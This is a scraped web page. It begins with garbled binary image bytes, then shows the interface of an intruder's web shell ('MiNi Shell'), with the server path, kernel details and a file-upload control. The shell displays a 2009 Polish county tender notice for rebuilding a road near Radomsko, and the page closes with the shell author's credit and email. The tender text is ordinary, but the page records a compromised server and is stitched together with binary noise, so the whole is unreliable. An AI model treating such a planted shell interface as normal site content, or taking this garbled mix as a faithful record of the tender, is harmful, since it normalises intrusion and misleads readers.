JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090121/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090121/6644-N-2009.html

<p class="kh_header"><b>Radomsko: http://www.powiat.radomszczanski.pl./bip/</b><br>
<b>Numer ogłoszenia: 6644 - 2009; data zamieszczenia: 21.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Radomszczański , ul. Leszka Czarnego 22/316, 97-500 Radomsko, woj. łódzkie, tel. 044 6834509, faks 044 6834192.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.powiat.radomszczanski.pl./bip/</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> http://www.powiat.radomszczanski.pl./bip/.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przebudowa drogi powiatowej nr 3947E Radomsko - Sulmierzyce na odcinku
granica Gmin Dobryszyce/Lgota Wielka do miejscowości Lgota Wielka, powiat radomszczański. Odcinek o 
długości 2471m od  km 3 + 841 do km 6 + 312. Zadanie realizowane będzie w ramach Programu 
Wieloletniego pod nazwą Narodowy Program Przebudowy Dróg Lokalnych 2008-2011. 
Przedmiot zamówienia, o którym mowa w pkt. 3.1 obejmuje wykonanie następującego zakresu robót:
A. ROBOTY POMIAROWE
1.	Roboty pomiarowe - 2,471 km
B. ROBOTY ROZBIÓRKOWE
2.	Rozebranie krawężników betonowych 15x30cm na podsypce cem.- piaskowej -760,00 m
3.	Rozebranie ław pod krawężniki z betonu - 45,60 m3
4.	Mechaniczne rozebranie chodników betonowych o grub. 8 cm - 860,00 m2
5.	Wywiezienie gruzu z terenu rozbiórki przy mechanicznym załadowaniu i wyładowaniu samochodem samowyładowczym na odległość do 3 km - 153,00 m3
C. WYKONANIE CHODNIKA
6.	Ława pod krawężniki betonowa z oporem - 99,00 m3
7.	Krawężniki betonowe wystające o wym. 15x30 cm na podsypce cem. - piaskowej - 1650,00 m
8.	Obrzeża betonowe o wym. 20x6 cm na podsypce piaskowej z wyp. spoin zaprawą cementową - 650,00 m
9.	Ręczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w gr. kat. III-IV - 1030,00 m2
10.	Mechaniczne zagęszczenie warstwy odsączającej w korycie lub na całej szer. drogi - grub. warstwy po zag. 10 cm - 1030,00 m2
11.	Nawierzchnie z kostki brukowej betonowej grub. 6 cm na podsypce cementowo-piaskowej - 1030,00 m2
12.	Roboty ziemne wykon. koparkami podsiębiernymi o poj. łyżki 0.15 m3 w gr. kat. III z transp. urobku samochód. samowyładowczymi na odległość do 3 km - 98,00 m3
13.	Mechaniczne zagęszczenie warstwy odsączającej w korycie lub na całej szer. drogi - grub. warstwy po zag. 10 cm - ZJAZDY - 490,00 m2
14.	Podbudowa z kruszywa łamanego - warstwa dolna o grub. po zagęszcz. 12 cm - ZJAZDY - 490,00 m2
15.	Podbudowa z kruszywa łamanego - warstwa górna o grub. po zagęszcz. 8 cm - ZJAZDY - 490,00 m2
16.	 Nawierzchnie z kostki brukowej betonowej grub. 8 cm na podsypce cementowo-piaskowej - ZJAZDY - 490,00 m2
D. STUDNIE I KRATKI ŚCIEKOWE                    
17.	Regulacja pionowa studzienek dla włazów kanałowych - 30 szt.
18.	Regulacja pionowa studzienek dla kratek ściekowych ulicznych - 11 szt.
E. KANALIZACJA DESZCZOWA
19.	Mechaniczne rozebranie nawierzchni z mieszanek mineralno-bitumicznych o grub. 10 cm - 18,00 m2
20.	Roboty ziemne wykon. koparkami podsiębiernymi o poj. łyżki 0.25 m3 w gr. kat. III z transp. urobku samochód. samowyładowczymi na odległość do 1 km - 18,00 m3 
21.	Demontaż studzienek ściekowych ulicznych betonowych o śr. 500 mm bez osadnika i bez syfonu - 3 kpl.
22.	Kanały z rur PVC łączonych na wcisk o śr. zewn. 200 mm - 12,00 m
23.	Studzienki ściekowe uliczne betonowe o śr.500 mm z osadnikiem i syfonem - 6 szt.
24.	Rozebranie ścieków z elementów betonowych o grub. 15 cm na podsypce piaskowej - 89,00 m
25.	Wywiezienie gruzu z terenu rozbiórki przy mechanicznym załadowaniu i wyładowaniu samochodem samowyładowczym na odleg. do 3 km - 12,00 m3
26.	Ława pod ściek betonowa zwykła - 6,675 m3
27.	Ścieki z elementów betonowych gr. 15 cm na podsypce cementowo-piaskowej - 89,00 m
F. NAWIERZCHNIA JEZDNI
28.	Mechaniczne czyszczenie nawierzchni drogowej ulepszonej (bitum) - 17 297,00 m2
29.	Skropienie nawierzchni drogowej asfaltem - 17 297,00 m2
30.	Nawierzchnia z mieszanek mineralno-bitumicznych grysowo-żwirowych - warstwa wyrównawcza asfaltowa - grub. po zagęszcz. 3 cm - 14 427,00 m2
31.	Nawierzchnia z mieszanek mineralno-bitumicznych grysowo-żwirowych - warstwa wyrównawcza asfaltowa - grub. po zagęszcz. 6 cm - 14 427,00 m2
32.	Nawierzchnia z mieszanek mineralno-bitumicznych grysowo-żwirowych - warstwa ścieralna asfaltowa - grub. po zagęszcz. 5 cm - 17 297,00 m2
G. SKRZYŻOWANIA
33.	Roboty ziemne wykon. koparkami podsiębiernymi o poj. łyżki 0.40 m3 w gr. kat. III z transp. urobku samochód. samowyładowczymi na odległość do 3 km - 30,00 m3
34.	Mechaniczne zagęszczenie warstwy odsączającej w korycie lub na całej szer. drogi - grub. warstwy po zag. 15 cm - 60,00 m2
35.	Podbudowa z kruszywa łamanego - warstwa dolna o grub. po zagęszcz. 12 cm - 60,00 m2
36.	Podbudowa z kruszywa łamanego - warstwa górna o grub. po zagęszcz. 8 cm - 60,00 m2
37.	Nawierzchnia z mieszanek mineralno-bitumicznych grysowo-żwirowych - warstwa wyrównawcza asfaltowa - grub. po zagęszcz.4 cm - 250,00 m2
38.	Nawierzchnia z mieszanek mineralno-bitumicznych grysowo-żwirowych - warstwa ścieralna asfaltowa - grub. po zagęszcz. 5 cm - 250,00 m2
H. PRZEPUSTY
39.	Rozebranie przepustów rurowych - ścianki czołowe i ławy betonowe - 9,00 m3
40.	Części przelotowe prefabrykowanych przepustów drogowych rurowych dwuotworowych z rur o śr. 100 cm x 2 - 2,00 m
41.	Obudowy wlotów (wylotów) prefabrykowanych przepustów drogowych rurowych - 5,00 m3
42.	Rozebranie przepustów skrzynkowych - ścianki czołowe i ławy betonowe - 5,00  m3
43.	Części przelotowe prefabrykowanych przepustów drogowych skrzynkowych o przekroju zamkniętym o wym. 1.0 x 1.0 m i 1 otw. (PRZEPUST SKRZYNKOWY 0.6 x 0.8) - 2,00 m
44.	Obudowy wlotów (wylotów) prefabrykowanych przepustów drogowych skrzynkowych - 4,00 m3
I. POBOCZA TŁUCZNIOWE
45.	Podbudowa z kruszywa łamanego - warstwa górna o grub. po zagęszcz. 10 cm (POBOCZA TŁUCZNIOWE) - 2576,00 m2
46.	Zagęszczanie nasypów (POBOCZA TŁUCZNIOWE) walcami samojezdnymi statycznymi - 257,60 m3  
J. ROWY 
47.	Roboty ziemne wykon. koparkami podsiębiernymi o poj. łyżki 0.60 m3 w gr. kat. III z transp. urobku samochód. samowyładowczymi na odległość do 3 km - 1012,00 m3
48.	Przepusty rurowe pod zjazdami - ława fundamentowa żwirowa - 15,00 m3
49.	Przepusty rurowe pod zjazdami - rury betonowe o śr. 40 cm - 250,00 m
K. OZNAKOWANIE
50.	Mechaniczne malowanie linii na skrzyżowaniach i przejściach dla pieszych farbą akrylową - 10,00 m2
51.	Mechaniczne malowanie linii segregacyjnych i krawędziowych ciągłych na jezdni farbą akrylową - 120,00 m2
52.	Mechaniczne malowanie linii segregacyjnych i krawędziowych przerywanych na jezdni farbą akrylową - 150,00 m
Szczegółowy opis przedmiotu zamówienia zawiera: przedmiar robót oraz specyfikacja techniczna wykonania i odbioru robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.07.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 50.000,00 PLN - słownie: pięćdziesiąt tysięcy złotych 00/100.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> I. O udzielenie zamówienia może ubiegać się Wykonawca, który:

1)	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
      2)   posiada niezbędną wiedzę i doświadczenie do wykonania zamówienia, w tym wykonał  w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 2 roboty budowlane polegające na budowie, remoncie lub przebudowie dróg publicznych o wartości zadania minimum 2 000 000,00 brutto zł każde. Przez drogi publiczne należy rozumieć drogi publiczne w myśl ustawy z dnia 21 marca 1985r. o drogach publicznych; 

     3)   dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, w tym dysponuje co najmniej osobą, która pełnić będzie funkcję kierownika budowy posiadającą określone przepisami Prawa Budowlanego (tj. Dz.U. z 2006 r. Nr 156, poz.1118 ze zm.) uprawnienia budowlane                w specjalności drogowej bez ograniczeń z przynależnością do właściwej izby samorządu zawodowego lub przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia  potencjału technicznego i osób zdolnych do wykonania zamówienia,

4)   znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, w tym jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę ubezpieczenia nie mniejszą niż 2 000.000,00 PLN;

5)   nie podlega wykluczeniu z postępowania o udzielenie zamówienia.
II. Opis sposobu dokonywania oceny spełniania tych warunków:
Złożenie przez Wykonawcę w ofercie dokumentów i oświadczeń wymienionych w Sekcji III.2)                   pkt III.1.niniejszego ogłoszenia będzie stanowiło podstawę do oceny spełnienia warunków udziału                 w postępowaniu. Zamawiający sprawdzi z treści tych dokumentów i oświadczeń czy Wykonawca spełnia wszystkie w/w warunki.
Uwaga: 
Zmawiający wykluczy z postępowania Wykonawcę, który nie spełnia wymaganych warunków oraz jeżeli stwierdzi, że złożone przez niego informacje mające wpływ na wynik prowadzonego postępowania               są nieprawdziwe..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> III.1. Oświadczenia oraz dokumenty, potwierdzające spełnianie warunków, o których mowa w Sekcji III.2 pkt. I:

1)	oświadczenie o spełnianiu warunków udziału w postępowaniu określonych  w art. 22 ust. 1 ustawy - z wykorzystaniem wzorów określonych w dodatku nr 2A, 2B, 2C, 2D, 2E, 2F do SIWZ,
              Uwaga: Jeżeli wykonawca nie dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, a wskazał w ofercie, że będzie dysponował takim potencjałem technicznym           i osobami, wówczas winien dodatkowo złożyć oświadczenie - z wykorzystaniem wzoru             w dodatku nr 2D do SIWZ.
2)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
3)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu podatkowego, wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; 
4)	aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że wykonawca nie zalega        z opłacaniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż           3 miesiące przed upływem terminu składania ofert;
5)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
6)	aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem   terminu składania ofert (dotyczy podmiotów zbiorowych w myśl ustawy z dnia 28  października 2002 r. o odpowiedzialności podmiotów zbiorowych za czyny   zabronione pod groźbą kary - Dz.U. z 2002 r. Nr 197, poz. 1661    z późn. zm.);
7)	wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie (np. referencje Zamawiającego).            W wykazie należy wskazać, co najmniej dwie roboty budowlane spełniające wymóg określony Sekcji III.2 pkt 5.1. ppkt 2. 

8)	wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia, wraz                         z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności; W wykazie należy wskazać co najmniej osobę o której mowa Sekcji III pkt 5.1. ppkt 3.).

9)	dokumenty stwierdzające że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, tj.              w odniesieniu do osoby o której mowa w Sekcji III. 2 pkt 5.1 ppkt 3.) wykonawca dołączy określone przepisami Prawa Budowlanego (tj. Dz.U. z 2006 r. Nr 156, poz.1118 ze zm.) uprawnienia budowlane uprawniające tę osobę do kierowania robotami budowlanymi w specjalności drogowej                        bez ograniczeń wraz z zaświadczeniem o aktualnej przynależności tej osoby do właściwej izby samorządu zawodowego.
10)	polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.    

III. 2. Oferta wspólna

Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (w ramach oferty wspólnej   w rozumieniu art. 23 ustawy) pod warunkiem, że taka oferta spełniać będzie następujące wymagania:
1)	Wykonawcy występujący wspólnie są zobowiązani do ustanowienia Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;
2)	Oryginał pełnomocnictwa lub kopia poświadczona za zgodność z oryginałem przez notariusza powinien być załączony do oferty i zawierać w szczególności wskazanie:
a)	postępowania o zamówienie publiczne, którego dotyczy;
b)	wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby;
c)	ustanowionego Pełnomocnika oraz zakres jego umocowania;
3)	Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców.
4)	Dokumenty, o których mowa w Sekcji III.2) pkt III.1. ppkt. 1,2,3,4,5,6, musi złożyć osobno każdy     z Wykonawców składających ofertę wspólną;
5)	Wykonawcy występujący wspólnie muszą spełniać łącznie wymagania określone w Sekcji III.2 pkt. I ppkt 2,3.
6)	Wymagania określone w Sekcji III.2) pkt. I ppkt 4 winny być spełnione przez co najmniej jednego Wykonawcę występującego wspólnie z innymi (wymaganie nie podlega sumowaniu). 
7)	Dokumenty, o których mowa w Sekcji III.2) pkt III.1. ppkt 10 nie są wymagane do złożenia przez wszystkich Wykonawców występujący wspólnie jeśli warunki, na potwierdzenie których                  są składane, zostaną spełnione przez jednego lub kilku z Wykonawców występujących wspólnie.
Pozostałe dokumenty są wspólne dla wszystkich występujących wspólnie Wykonawców. 
8)	Formularze, dokumenty sporządzone na załączonych do SIWZ wzorach, składa i podpisuje              w imieniu wszystkich Wykonawców, Pełnomocnik wpisując w miejscu przeznaczonym na podanie nazwy i adresu Wykonawcy, nazwy i adresy wszystkich Wykonawców składających ofertę wspólną;
9)	Wszystkie kopie dokumentów załączone do oferty muszą być opisane za zgodność z oryginałem     i podpisane przez Pełnomocnika;
10)	Wszelka korespondencja prowadzona będzie przez Zamawiającego wyłącznie z Pełnomocnikiem, którego adres należy wpisać w formularzu ofertowym.
III.3. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej
III.3.1 Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w Sekcji III.2) pkt III.1
1)	ppkt 2,3,4,6 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne                  i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie
2)	ppkt 5 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.
III.3.2 Dokumenty, o których  mowa w Sekcji III.2) pkt III.3.1 ppkt 1 lit. a) i c), oraz ppkt 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w Sekcji III.2) pkt III.3.1 ppkt 1 lit. b) powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
III.3.3. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w Sekcji III.2) pkt III.3.1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Postanowienia Sekcji III.3.2 stosuje się odpowiednio..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://www.powiat.radomszczanski.pl./bip/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Radomsku 
Referat ds. Pozyskiwania Funduszy Zewnętrznych i Zamówień Publicznych, 
97-500 Radomsko, ul. Leszka Czarnego 22.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.02.2009 godzina 10:00, miejsce: Starostwo Powiatowe w Radomsku - Kancelaria Ogólna (p.217), 97-500 Radomsko ul. Leszka Czarnego 22.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 13.03.2009.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com